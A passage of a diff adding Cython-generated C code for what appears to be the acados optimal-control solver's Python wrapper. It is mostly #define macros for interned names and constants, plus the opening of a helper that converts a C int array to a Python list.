__pyx_kp_u__7 __pyx_mstate_global->__pyx_kp_u__7 +#define __pyx_n_s__84 __pyx_mstate_global->__pyx_n_s__84 +#define __pyx_n_s_abc __pyx_mstate_global->__pyx_n_s_abc +#define __pyx_n_s_acados_template_acados_ocp_solve __pyx_mstate_global->__pyx_n_s_acados_template_acados_ocp_solve +#define __pyx_n_s_allocate_buffer __pyx_mstate_global->__pyx_n_s_allocate_buffer +#define __pyx_n_u_alpha __pyx_mstate_global->__pyx_n_u_alpha +#define __pyx_n_u_alpha_min __pyx_mstate_global->__pyx_n_u_alpha_min +#define __pyx_n_u_alpha_reduction __pyx_mstate_global->__pyx_n_u_alpha_reduction +#define __pyx_kp_u_alpha_values_are_not_available_f __pyx_mstate_global->__pyx_kp_u_alpha_values_are_not_available_f +#define __pyx_kp_u_and __pyx_mstate_global->__pyx_kp_u_and +#define __pyx_n_s_array __pyx_mstate_global->__pyx_n_s_array +#define __pyx_n_s_ascontiguousarray __pyx_mstate_global->__pyx_n_s_ascontiguousarray +#define __pyx_n_s_asfortranarray __pyx_mstate_global->__pyx_n_s_asfortranarray +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_kp_u_at_stage __pyx_mstate_global->__pyx_kp_u_at_stage +#define __pyx_n_s_base __pyx_mstate_global->__pyx_n_s_base +#define __pyx_n_s_c __pyx_mstate_global->__pyx_n_s_c +#define __pyx_n_u_c __pyx_mstate_global->__pyx_n_u_c +#define __pyx_n_s_class __pyx_mstate_global->__pyx_n_s_class +#define __pyx_n_s_class_getitem __pyx_mstate_global->__pyx_n_s_class_getitem +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_collections __pyx_mstate_global->__pyx_n_s_collections +#define __pyx_kp_s_collections_abc __pyx_mstate_global->__pyx_kp_s_collections_abc +#define __pyx_n_s_constraints_fields __pyx_mstate_global->__pyx_n_s_constraints_fields +#define __pyx_n_s_constraints_set __pyx_mstate_global->__pyx_n_s_constraints_set +#define __pyx_kp_s_contiguous_and_direct __pyx_mstate_global->__pyx_kp_s_contiguous_and_direct +#define __pyx_kp_s_contiguous_and_indirect __pyx_mstate_global->__pyx_kp_s_contiguous_and_indirect +#define __pyx_n_s_cost_fields __pyx_mstate_global->__pyx_n_s_cost_fields +#define __pyx_n_s_cost_set __pyx_mstate_global->__pyx_n_s_cost_set +#define __pyx_n_s_count __pyx_mstate_global->__pyx_n_s_count +#define __pyx_n_s_datetime __pyx_mstate_global->__pyx_n_s_datetime +#define __pyx_n_s_default __pyx_mstate_global->__pyx_n_s_default +#define __pyx_n_s_dict __pyx_mstate_global->__pyx_n_s_dict +#define __pyx_n_s_dims __pyx_mstate_global->__pyx_n_s_dims +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_n_s_double_fields __pyx_mstate_global->__pyx_n_s_double_fields +#define __pyx_n_s_double_value __pyx_mstate_global->__pyx_n_s_double_value +#define __pyx_n_s_dtype __pyx_mstate_global->__pyx_n_s_dtype +#define __pyx_n_s_dtype_is_object __pyx_mstate_global->__pyx_n_s_dtype_is_object +#define __pyx_n_s_dump __pyx_mstate_global->__pyx_n_s_dump +#define __pyx_n_s_dynamics_get __pyx_mstate_global->__pyx_n_s_dynamics_get +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_encode __pyx_mstate_global->__pyx_n_s_encode +#define __pyx_n_s_enter __pyx_mstate_global->__pyx_n_s_enter +#define __pyx_n_s_enumerate __pyx_mstate_global->__pyx_n_s_enumerate +#define __pyx_n_u_eps_sufficient_descent __pyx_mstate_global->__pyx_n_u_eps_sufficient_descent +#define __pyx_n_s_error __pyx_mstate_global->__pyx_n_s_error +#define __pyx_n_s_eval_param_sens __pyx_mstate_global->__pyx_n_s_eval_param_sens +#define __pyx_n_u_ex __pyx_mstate_global->__pyx_n_u_ex +#define __pyx_n_s_exit __pyx_mstate_global->__pyx_n_s_exit +#define __pyx_n_s_f __pyx_mstate_global->__pyx_n_s_f +#define __pyx_n_s_field __pyx_mstate_global->__pyx_n_s_field +#define __pyx_n_s_field_2 __pyx_mstate_global->__pyx_n_s_field_2 +#define __pyx_n_s_fields __pyx_mstate_global->__pyx_n_s_fields +#define __pyx_n_s_filename __pyx_mstate_global->__pyx_n_s_filename +#define __pyx_n_s_flags __pyx_mstate_global->__pyx_n_s_flags +#define __pyx_n_s_float64 __pyx_mstate_global->__pyx_n_s_float64 +#define __pyx_kp_u_for_field __pyx_mstate_global->__pyx_kp_u_for_field +#define __pyx_n_s_format __pyx_mstate_global->__pyx_n_s_format +#define __pyx_n_s_fortran __pyx_mstate_global->__pyx_n_s_fortran +#define __pyx_n_u_fortran __pyx_mstate_global->__pyx_n_u_fortran +#define __pyx_n_s_full_stats __pyx_mstate_global->__pyx_n_s_full_stats +#define __pyx_n_u_full_step_dual __pyx_mstate_global->__pyx_n_u_full_step_dual +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_get __pyx_mstate_global->__pyx_n_s_get +#define __pyx_n_s_get_cost __pyx_mstate_global->__pyx_n_s_get_cost +#define __pyx_n_s_get_pointers_solver __pyx_mstate_global->__pyx_n_s_get_pointers_solver +#define __pyx_n_s_get_residuals __pyx_mstate_global->__pyx_n_s_get_residuals +#define __pyx_n_s_get_stat_double __pyx_mstate_global->__pyx_n_s_get_stat_double +#define __pyx_n_s_get_stat_int __pyx_mstate_global->__pyx_n_s_get_stat_int +#define __pyx_n_s_get_stat_matrix __pyx_mstate_global->__pyx_n_s_get_stat_matrix +#define __pyx_n_s_get_stats __pyx_mstate_global->__pyx_n_s_get_stats +#define __pyx_n_s_getcwd __pyx_mstate_global->__pyx_n_s_getcwd +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_u_globalization __pyx_mstate_global->__pyx_n_u_globalization +#define __pyx_n_u_globalization_use_SOC __pyx_mstate_global->__pyx_n_u_globalization_use_SOC +#define __pyx_kp_u_got __pyx_mstate_global->__pyx_kp_u_got +#define __pyx_kp_u_got_differing_extents_in_dimensi __pyx_mstate_global->__pyx_kp_u_got_differing_extents_in_dimensi +#define __pyx_n_s_i __pyx_mstate_global->__pyx_n_s_i +#define __pyx_n_s_id __pyx_mstate_global->__pyx_n_s_id +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_n_s_indent __pyx_mstate_global->__pyx_n_s_indent +#define __pyx_n_s_index __pyx_mstate_global->__pyx_n_s_index +#define __pyx_n_u_initialize_t_slacks __pyx_mstate_global->__pyx_n_u_initialize_t_slacks +#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing +#define __pyx_n_s_int __pyx_mstate_global->__pyx_n_s_int +#define __pyx_n_s_int_fields __pyx_mstate_global->__pyx_n_s_int_fields +#define __pyx_n_s_int_value __pyx_mstate_global->__pyx_n_s_int_value +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_isfile __pyx_mstate_global->__pyx_n_s_isfile +#define __pyx_n_s_itemsize __pyx_mstate_global->__pyx_n_s_itemsize +#define __pyx_kp_s_itemsize_0_for_cython_array __pyx_mstate_global->__pyx_kp_s_itemsize_0_for_cython_array +#define __pyx_n_u_iterate __pyx_mstate_global->__pyx_n_u_iterate +#define __pyx_n_s_join __pyx_mstate_global->__pyx_n_s_join +#define __pyx_n_s_json __pyx_mstate_global->__pyx_n_s_json +#define __pyx_kp_u_json_2 __pyx_mstate_global->__pyx_kp_u_json_2 +#define __pyx_n_s_key __pyx_mstate_global->__pyx_n_s_key +#define __pyx_n_s_keys __pyx_mstate_global->__pyx_n_s_keys +#define __pyx_n_u_lam __pyx_mstate_global->__pyx_n_u_lam +#define __pyx_n_u_lam_2 __pyx_mstate_global->__pyx_n_u_lam_2 +#define __pyx_n_u_lbu __pyx_mstate_global->__pyx_n_u_lbu +#define __pyx_n_u_lbx __pyx_mstate_global->__pyx_n_u_lbx +#define __pyx_n_u_line_search_use_sufficient_desce __pyx_mstate_global->__pyx_n_u_line_search_use_sufficient_desce +#define __pyx_n_s_load __pyx_mstate_global->__pyx_n_s_load +#define __pyx_n_s_load_iterate __pyx_mstate_global->__pyx_n_s_load_iterate +#define __pyx_kp_u_load_iterate_failed_file_does_no __pyx_mstate_global->__pyx_kp_u_load_iterate_failed_file_does_no +#define __pyx_n_s_m __pyx_mstate_global->__pyx_n_s_m +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_mem_fields __pyx_mstate_global->__pyx_n_s_mem_fields +#define __pyx_n_s_memview __pyx_mstate_global->__pyx_n_s_memview +#define __pyx_n_s_min_size __pyx_mstate_global->__pyx_n_s_min_size +#define __pyx_n_s_mode __pyx_mstate_global->__pyx_n_s_mode +#define __pyx_n_s_model_name __pyx_mstate_global->__pyx_n_s_model_name +#define __pyx_n_s_msg __pyx_mstate_global->__pyx_n_s_msg +#define __pyx_n_s_n __pyx_mstate_global->__pyx_n_s_n +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_name_2 __pyx_mstate_global->__pyx_n_s_name_2 +#define __pyx_n_s_ndim __pyx_mstate_global->__pyx_n_s_ndim +#define __pyx_n_s_new __pyx_mstate_global->__pyx_n_s_new +#define __pyx_n_s_new_time_steps __pyx_mstate_global->__pyx_n_s_new_time_steps +#define __pyx_n_s_nlp_solver_type __pyx_mstate_global->__pyx_n_s_nlp_solver_type +#define __pyx_kp_s_no_default___reduce___due_to_non __pyx_mstate_global->__pyx_kp_s_no_default___reduce___due_to_non +#define __pyx_n_s_np __pyx_mstate_global->__pyx_n_s_np +#define __pyx_n_s_numpy __pyx_mstate_global->__pyx_n_s_numpy +#define __pyx_kp_u_numpy_core_multiarray_failed_to __pyx_mstate_global->__pyx_kp_u_numpy_core_multiarray_failed_to +#define __pyx_kp_u_numpy_core_umath_failed_to_impor __pyx_mstate_global->__pyx_kp_u_numpy_core_umath_failed_to_impor +#define __pyx_n_s_nx __pyx_mstate_global->__pyx_n_s_nx +#define __pyx_n_s_obj __pyx_mstate_global->__pyx_n_s_obj +#define __pyx_n_s_open __pyx_mstate_global->__pyx_n_s_open +#define __pyx_n_s_options_set __pyx_mstate_global->__pyx_n_s_options_set +#define __pyx_n_s_order __pyx_mstate_global->__pyx_n_s_order +#define __pyx_n_s_os __pyx_mstate_global->__pyx_n_s_os +#define __pyx_n_s_out __pyx_mstate_global->__pyx_n_s_out +#define __pyx_n_s_out_fields __pyx_mstate_global->__pyx_n_s_out_fields +#define __pyx_n_s_out_mat __pyx_mstate_global->__pyx_n_s_out_mat +#define __pyx_n_s_overwrite __pyx_mstate_global->__pyx_n_s_overwrite +#define __pyx_n_u_p __pyx_mstate_global->__pyx_n_u_p +#define __pyx_n_s_pack __pyx_mstate_global->__pyx_n_s_pack +#define __pyx_n_s_path __pyx_mstate_global->__pyx_n_s_path +#define __pyx_n_u_pi __pyx_mstate_global->__pyx_n_u_pi +#define __pyx_n_u_pi_2 __pyx_mstate_global->__pyx_n_u_pi_2 +#define __pyx_n_s_pickle __pyx_mstate_global->__pyx_n_s_pickle +#define __pyx_n_s_print __pyx_mstate_global->__pyx_n_s_print +#define __pyx_n_u_print_level __pyx_mstate_global->__pyx_n_u_print_level +#define __pyx_n_s_print_statistics __pyx_mstate_global->__pyx_n_s_print_statistics +#define __pyx_n_s_pyx_PickleError __pyx_mstate_global->__pyx_n_s_pyx_PickleError +#define __pyx_n_s_pyx_checksum __pyx_mstate_global->__pyx_n_s_pyx_checksum +#define __pyx_n_s_pyx_result __pyx_mstate_global->__pyx_n_s_pyx_result +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_pyx_type __pyx_mstate_global->__pyx_n_s_pyx_type +#define __pyx_n_s_pyx_unpickle_Enum __pyx_mstate_global->__pyx_n_s_pyx_unpickle_Enum +#define __pyx_n_s_pyx_vtable __pyx_mstate_global->__pyx_n_s_pyx_vtable +#define __pyx_n_u_qp_iter __pyx_mstate_global->__pyx_n_u_qp_iter +#define __pyx_n_u_qp_mu0 __pyx_mstate_global->__pyx_n_u_qp_mu0 +#define __pyx_n_s_qp_solver_cond_N __pyx_mstate_global->__pyx_n_s_qp_solver_cond_N +#define __pyx_n_u_qp_tau_min __pyx_mstate_global->__pyx_n_u_qp_tau_min +#define __pyx_n_u_qp_tol_comp __pyx_mstate_global->__pyx_n_u_qp_tol_comp +#define __pyx_n_u_qp_tol_eq __pyx_mstate_global->__pyx_n_u_qp_tol_eq +#define __pyx_n_u_qp_tol_ineq __pyx_mstate_global->__pyx_n_u_qp_tol_ineq +#define __pyx_n_u_qp_tol_stat __pyx_mstate_global->__pyx_n_u_qp_tol_stat +#define __pyx_n_u_qp_warm_start __pyx_mstate_global->__pyx_n_u_qp_warm_start +#define __pyx_n_u_r __pyx_mstate_global->__pyx_n_u_r +#define __pyx_n_s_range __pyx_mstate_global->__pyx_n_s_range +#define __pyx_n_s_recompute __pyx_mstate_global->__pyx_n_s_recompute +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_register __pyx_mstate_global->__pyx_n_s_register +#define __pyx_n_b_res_comp __pyx_mstate_global->__pyx_n_b_res_comp +#define __pyx_n_b_res_eq __pyx_mstate_global->__pyx_n_b_res_eq +#define __pyx_n_b_res_ineq __pyx_mstate_global->__pyx_n_b_res_ineq +#define __pyx_n_b_res_stat __pyx_mstate_global->__pyx_n_b_res_stat +#define __pyx_n_s_reset __pyx_mstate_global->__pyx_n_s_reset +#define __pyx_n_u_residuals __pyx_mstate_global->__pyx_n_u_residuals +#define __pyx_n_u_rti_phase __pyx_mstate_global->__pyx_n_u_rti_phase +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_n_s_set __pyx_mstate_global->__pyx_n_s_set +#define __pyx_n_s_set_new_time_steps __pyx_mstate_global->__pyx_n_s_set_new_time_steps +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_shape __pyx_mstate_global->__pyx_n_s_shape +#define __pyx_n_s_size __pyx_mstate_global->__pyx_n_s_size +#define __pyx_n_u_sl __pyx_mstate_global->__pyx_n_u_sl +#define __pyx_n_u_sl_2 __pyx_mstate_global->__pyx_n_u_sl_2 +#define __pyx_n_s_solution __pyx_mstate_global->__pyx_n_s_solution +#define __pyx_n_s_solve __pyx_mstate_global->__pyx_n_s_solve +#define __pyx_kp_u_solver_option_must_be_of_type_fl __pyx_mstate_global->__pyx_kp_u_solver_option_must_be_of_type_fl +#define __pyx_kp_u_solver_option_must_be_of_type_in __pyx_mstate_global->__pyx_kp_u_solver_option_must_be_of_type_in +#define __pyx_kp_u_solver_option_must_be_of_type_st __pyx_mstate_global->__pyx_kp_u_solver_option_must_be_of_type_st +#define __pyx_n_s_sort_keys __pyx_mstate_global->__pyx_n_s_sort_keys +#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec +#define __pyx_n_s_split __pyx_mstate_global->__pyx_n_s_split +#define __pyx_n_s_sqp_iter __pyx_mstate_global->__pyx_n_s_sqp_iter +#define __pyx_n_u_sqp_iter __pyx_mstate_global->__pyx_n_u_sqp_iter +#define __pyx_n_s_stage __pyx_mstate_global->__pyx_n_s_stage +#define __pyx_n_s_start __pyx_mstate_global->__pyx_n_s_start +#define __pyx_n_s_stat_m __pyx_mstate_global->__pyx_n_s_stat_m +#define __pyx_n_u_stat_m __pyx_mstate_global->__pyx_n_u_stat_m +#define __pyx_n_s_stat_n __pyx_mstate_global->__pyx_n_s_stat_n +#define __pyx_n_u_stat_n __pyx_mstate_global->__pyx_n_u_stat_n +#define __pyx_n_u_statistics __pyx_mstate_global->__pyx_n_u_statistics +#define __pyx_n_s_step __pyx_mstate_global->__pyx_n_s_step +#define __pyx_n_u_step_length __pyx_mstate_global->__pyx_n_u_step_length +#define __pyx_n_s_stop __pyx_mstate_global->__pyx_n_s_stop +#define __pyx_n_s_store_iterate __pyx_mstate_global->__pyx_n_s_store_iterate +#define __pyx_n_s_store_iterate_locals_lambda __pyx_mstate_global->__pyx_n_s_store_iterate_locals_lambda +#define __pyx_kp_u_stored_current_iterate_in __pyx_mstate_global->__pyx_kp_u_stored_current_iterate_in +#define __pyx_n_s_strftime __pyx_mstate_global->__pyx_n_s_strftime +#define __pyx_kp_s_strided_and_direct __pyx_mstate_global->__pyx_kp_s_strided_and_direct +#define __pyx_kp_s_strided_and_direct_or_indirect __pyx_mstate_global->__pyx_kp_s_strided_and_direct_or_indirect +#define __pyx_kp_s_strided_and_indirect __pyx_mstate_global->__pyx_kp_s_strided_and_indirect +#define __pyx_n_s_string_fields __pyx_mstate_global->__pyx_n_s_string_fields +#define __pyx_n_s_string_value __pyx_mstate_global->__pyx_n_s_string_value +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_struct __pyx_mstate_global->__pyx_n_s_struct +#define __pyx_n_u_su __pyx_mstate_global->__pyx_n_u_su +#define __pyx_n_u_su_2 __pyx_mstate_global->__pyx_n_u_su_2 +#define __pyx_n_s_sys __pyx_mstate_global->__pyx_n_s_sys +#define __pyx_n_u_t __pyx_mstate_global->__pyx_n_u_t +#define __pyx_n_u_t_2 __pyx_mstate_global->__pyx_n_u_t_2 +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_kp_s_third_party_acados_acados_templa __pyx_mstate_global->__pyx_kp_s_third_party_acados_acados_templa +#define __pyx_n_u_time_glob __pyx_mstate_global->__pyx_n_u_time_glob +#define __pyx_n_u_time_lin __pyx_mstate_global->__pyx_n_u_time_lin +#define __pyx_n_u_time_qp __pyx_mstate_global->__pyx_n_u_time_qp +#define __pyx_n_u_time_qp_solver_call __pyx_mstate_global->__pyx_n_u_time_qp_solver_call +#define __pyx_n_u_time_qp_xcond __pyx_mstate_global->__pyx_n_u_time_qp_xcond +#define __pyx_n_u_time_reg __pyx_mstate_global->__pyx_n_u_time_reg +#define __pyx_n_u_time_sim __pyx_mstate_global->__pyx_n_u_time_sim +#define __pyx_n_u_time_sim_ad __pyx_mstate_global->__pyx_n_u_time_sim_ad +#define __pyx_n_u_time_sim_la __pyx_mstate_global->__pyx_n_u_time_sim_la +#define __pyx_n_u_time_solution_sensitivities __pyx_mstate_global->__pyx_n_u_time_solution_sensitivities +#define __pyx_n_u_time_tot __pyx_mstate_global->__pyx_n_u_time_tot +#define __pyx_n_u_tol_comp __pyx_mstate_global->__pyx_n_u_tol_comp +#define __pyx_n_u_tol_eq __pyx_mstate_global->__pyx_n_u_tol_eq +#define __pyx_n_u_tol_ineq __pyx_mstate_global->__pyx_n_u_tol_ineq +#define __pyx_n_u_tol_stat __pyx_mstate_global->__pyx_n_u_tol_stat +#define __pyx_n_s_tolist __pyx_mstate_global->__pyx_n_s_tolist +#define __pyx_n_u_u __pyx_mstate_global->__pyx_n_u_u +#define __pyx_n_u_u_2 __pyx_mstate_global->__pyx_n_u_u_2 +#define __pyx_n_u_ubu __pyx_mstate_global->__pyx_n_u_ubu +#define __pyx_n_u_ubx __pyx_mstate_global->__pyx_n_u_ubx +#define __pyx_kp_s_unable_to_allocate_array_data __pyx_mstate_global->__pyx_kp_s_unable_to_allocate_array_data +#define __pyx_kp_s_unable_to_allocate_shape_and_str __pyx_mstate_global->__pyx_kp_s_unable_to_allocate_shape_and_str +#define __pyx_n_s_unpack __pyx_mstate_global->__pyx_n_s_unpack +#define __pyx_n_s_update __pyx_mstate_global->__pyx_n_s_update +#define __pyx_n_s_update_qp_solver_cond_N __pyx_mstate_global->__pyx_n_s_update_qp_solver_cond_N +#define __pyx_n_s_utcnow __pyx_mstate_global->__pyx_n_s_utcnow +#define __pyx_kp_u_utf_8 __pyx_mstate_global->__pyx_kp_u_utf_8 +#define __pyx_n_s_value __pyx_mstate_global->__pyx_n_s_value +#define __pyx_n_s_value_2 __pyx_mstate_global->__pyx_n_s_value_2 +#define __pyx_n_s_value_shape __pyx_mstate_global->__pyx_n_s_value_shape +#define __pyx_n_s_version_info __pyx_mstate_global->__pyx_n_s_version_info +#define __pyx_n_u_w __pyx_mstate_global->__pyx_n_u_w +#define __pyx_n_u_warm_start_first_qp __pyx_mstate_global->__pyx_n_u_warm_start_first_qp +#define __pyx_kp_u_with_dimension __pyx_mstate_global->__pyx_kp_u_with_dimension +#define __pyx_kp_u_with_dimension_you_have __pyx_mstate_global->__pyx_kp_u_with_dimension_you_have +#define __pyx_n_b_x __pyx_mstate_global->__pyx_n_b_x +#define __pyx_n_s_x __pyx_mstate_global->__pyx_n_s_x +#define __pyx_n_u_x __pyx_mstate_global->__pyx_n_u_x +#define __pyx_n_u_x_2 __pyx_mstate_global->__pyx_n_u_x_2 +#define __pyx_n_u_xdot_guess __pyx_mstate_global->__pyx_n_u_xdot_guess +#define __pyx_n_u_y_ref __pyx_mstate_global->__pyx_n_u_y_ref +#define __pyx_kp_u_you_have __pyx_mstate_global->__pyx_kp_u_you_have +#define __pyx_n_u_yref __pyx_mstate_global->__pyx_n_u_yref +#define __pyx_n_u_z __pyx_mstate_global->__pyx_n_u_z +#define __pyx_n_u_z_2 __pyx_mstate_global->__pyx_n_u_z_2 +#define __pyx_n_u_z_guess __pyx_mstate_global->__pyx_n_u_z_guess +#define __pyx_n_s_zeros __pyx_mstate_global->__pyx_n_s_zeros +#define __pyx_int_0 __pyx_mstate_global->__pyx_int_0 +#define __pyx_int_1 __pyx_mstate_global->__pyx_int_1 +#define __pyx_int_2 __pyx_mstate_global->__pyx_int_2 +#define __pyx_int_3 __pyx_mstate_global->__pyx_int_3 +#define __pyx_int_4 __pyx_mstate_global->__pyx_int_4 +#define __pyx_int_6 __pyx_mstate_global->__pyx_int_6 +#define __pyx_int_7 __pyx_mstate_global->__pyx_int_7 +#define __pyx_int_112105877 __pyx_mstate_global->__pyx_int_112105877 +#define __pyx_int_136983863 __pyx_mstate_global->__pyx_int_136983863 +#define __pyx_int_184977713 __pyx_mstate_global->__pyx_int_184977713 +#define __pyx_int_neg_1 __pyx_mstate_global->__pyx_int_neg_1 +#define __pyx_int_neg_5 __pyx_mstate_global->__pyx_int_neg_5 +#define __pyx_slice__5 __pyx_mstate_global->__pyx_slice__5 +#define __pyx_tuple__4 __pyx_mstate_global->__pyx_tuple__4 +#define __pyx_tuple__8 __pyx_mstate_global->__pyx_tuple__8 +#define __pyx_tuple__9 __pyx_mstate_global->__pyx_tuple__9 +#define __pyx_slice__16 __pyx_mstate_global->__pyx_slice__16 +#define __pyx_tuple__10 __pyx_mstate_global->__pyx_tuple__10 +#define __pyx_tuple__11 __pyx_mstate_global->__pyx_tuple__11 +#define __pyx_tuple__12 __pyx_mstate_global->__pyx_tuple__12 +#define __pyx_tuple__13 __pyx_mstate_global->__pyx_tuple__13 +#define __pyx_tuple__17 __pyx_mstate_global->__pyx_tuple__17 +#define __pyx_tuple__18 __pyx_mstate_global->__pyx_tuple__18 +#define __pyx_tuple__19 __pyx_mstate_global->__pyx_tuple__19 +#define __pyx_tuple__20 __pyx_mstate_global->__pyx_tuple__20 +#define __pyx_tuple__21 __pyx_mstate_global->__pyx_tuple__21 +#define __pyx_tuple__22 __pyx_mstate_global->__pyx_tuple__22 +#define __pyx_tuple__23 __pyx_mstate_global->__pyx_tuple__23 +#define __pyx_tuple__24 __pyx_mstate_global->__pyx_tuple__24 +#define __pyx_tuple__25 __pyx_mstate_global->__pyx_tuple__25 +#define __pyx_tuple__26 __pyx_mstate_global->__pyx_tuple__26 +#define __pyx_tuple__27 __pyx_mstate_global->__pyx_tuple__27 +#define __pyx_tuple__28 __pyx_mstate_global->__pyx_tuple__28 +#define __pyx_tuple__30 __pyx_mstate_global->__pyx_tuple__30 +#define __pyx_tuple__31 __pyx_mstate_global->__pyx_tuple__31 +#define __pyx_tuple__32 __pyx_mstate_global->__pyx_tuple__32 +#define __pyx_tuple__33 __pyx_mstate_global->__pyx_tuple__33 +#define __pyx_tuple__34 __pyx_mstate_global->__pyx_tuple__34 +#define __pyx_tuple__35 __pyx_mstate_global->__pyx_tuple__35 +#define __pyx_tuple__36 __pyx_mstate_global->__pyx_tuple__36 +#define __pyx_tuple__37 __pyx_mstate_global->__pyx_tuple__37 +#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 +#define __pyx_tuple__39 __pyx_mstate_global->__pyx_tuple__39 +#define __pyx_tuple__41 __pyx_mstate_global->__pyx_tuple__41 +#define __pyx_tuple__45 __pyx_mstate_global->__pyx_tuple__45 +#define __pyx_tuple__47 __pyx_mstate_global->__pyx_tuple__47 +#define __pyx_tuple__49 __pyx_mstate_global->__pyx_tuple__49 +#define __pyx_tuple__51 __pyx_mstate_global->__pyx_tuple__51 +#define __pyx_tuple__52 __pyx_mstate_global->__pyx_tuple__52 +#define __pyx_tuple__55 __pyx_mstate_global->__pyx_tuple__55 +#define __pyx_tuple__57 __pyx_mstate_global->__pyx_tuple__57 +#define __pyx_tuple__58 __pyx_mstate_global->__pyx_tuple__58 +#define __pyx_tuple__60 __pyx_mstate_global->__pyx_tuple__60 +#define __pyx_tuple__62 __pyx_mstate_global->__pyx_tuple__62 +#define __pyx_tuple__65 __pyx_mstate_global->__pyx_tuple__65 +#define __pyx_tuple__67 __pyx_mstate_global->__pyx_tuple__67 +#define __pyx_tuple__69 __pyx_mstate_global->__pyx_tuple__69 +#define __pyx_tuple__71 __pyx_mstate_global->__pyx_tuple__71 +#define __pyx_tuple__72 __pyx_mstate_global->__pyx_tuple__72 +#define __pyx_tuple__74 __pyx_mstate_global->__pyx_tuple__74 +#define __pyx_tuple__77 __pyx_mstate_global->__pyx_tuple__77 +#define __pyx_tuple__79 __pyx_mstate_global->__pyx_tuple__79 +#define __pyx_tuple__82 __pyx_mstate_global->__pyx_tuple__82 +#define __pyx_codeobj__40 __pyx_mstate_global->__pyx_codeobj__40 +#define __pyx_codeobj__42 __pyx_mstate_global->__pyx_codeobj__42 +#define __pyx_codeobj__43 __pyx_mstate_global->__pyx_codeobj__43 +#define __pyx_codeobj__44 __pyx_mstate_global->__pyx_codeobj__44 +#define __pyx_codeobj__46 __pyx_mstate_global->__pyx_codeobj__46 +#define __pyx_codeobj__48 __pyx_mstate_global->__pyx_codeobj__48 +#define __pyx_codeobj__50 __pyx_mstate_global->__pyx_codeobj__50 +#define __pyx_codeobj__53 __pyx_mstate_global->__pyx_codeobj__53 +#define __pyx_codeobj__54 __pyx_mstate_global->__pyx_codeobj__54 +#define __pyx_codeobj__56 __pyx_mstate_global->__pyx_codeobj__56 +#define __pyx_codeobj__59 __pyx_mstate_global->__pyx_codeobj__59 +#define __pyx_codeobj__61 __pyx_mstate_global->__pyx_codeobj__61 +#define __pyx_codeobj__63 __pyx_mstate_global->__pyx_codeobj__63 +#define __pyx_codeobj__64 __pyx_mstate_global->__pyx_codeobj__64 +#define __pyx_codeobj__66 __pyx_mstate_global->__pyx_codeobj__66 +#define __pyx_codeobj__68 __pyx_mstate_global->__pyx_codeobj__68 +#define __pyx_codeobj__70 __pyx_mstate_global->__pyx_codeobj__70 +#define __pyx_codeobj__73 __pyx_mstate_global->__pyx_codeobj__73 +#define __pyx_codeobj__75 __pyx_mstate_global->__pyx_codeobj__75 +#define __pyx_codeobj__76 __pyx_mstate_global->__pyx_codeobj__76 +#define __pyx_codeobj__78 __pyx_mstate_global->__pyx_codeobj__78 +#define __pyx_codeobj__80 __pyx_mstate_global->__pyx_codeobj__80 +#define __pyx_codeobj__81 __pyx_mstate_global->__pyx_codeobj__81 +#define __pyx_codeobj__83 __pyx_mstate_global->__pyx_codeobj__83 +/* #### Code section: module_code ### */ + +/* "carray.to_py":114 + * + * @cname("__Pyx_carray_to_py_int") + * cdef inline list __Pyx_carray_to_py_int(base_type *v, Py_ssize_t length): # <<<<<<<<<<<<<< + * cdef size_t i + * cdef object value + */ + +static CYTHON_INLINE PyObject *__Pyx_carray_to_py_int(int *__pyx_v_v, Py_ssize_t __pyx_v_length) { + size_t __pyx_v_i; + PyObject *__pyx_v_value = 0; + PyObject *__pyx_v_l = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + size_t __pyx_t_2; + size_t __pyx_t_3; + size_t __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_carray_to_py_int", 0); + + /* "carray.to_py":117 + * cdef size_t i + * cdef object value + * l = PyList_New(length) # <<<<<<<<<<<<<< + * for i in range(length): + * value = v[i] + */ + __pyx_t_1 = PyList_New(__pyx_v_length); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 117, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_l = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "carray.to_py":118 + * cdef object value + * l = PyList_New(length) + * for i in range(length): # <<<<<<<<<<<<<< + * value = v[i] + * Py_INCREF(value) + */ + __pyx_t_2 = ((size_t)__pyx_v_length); + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 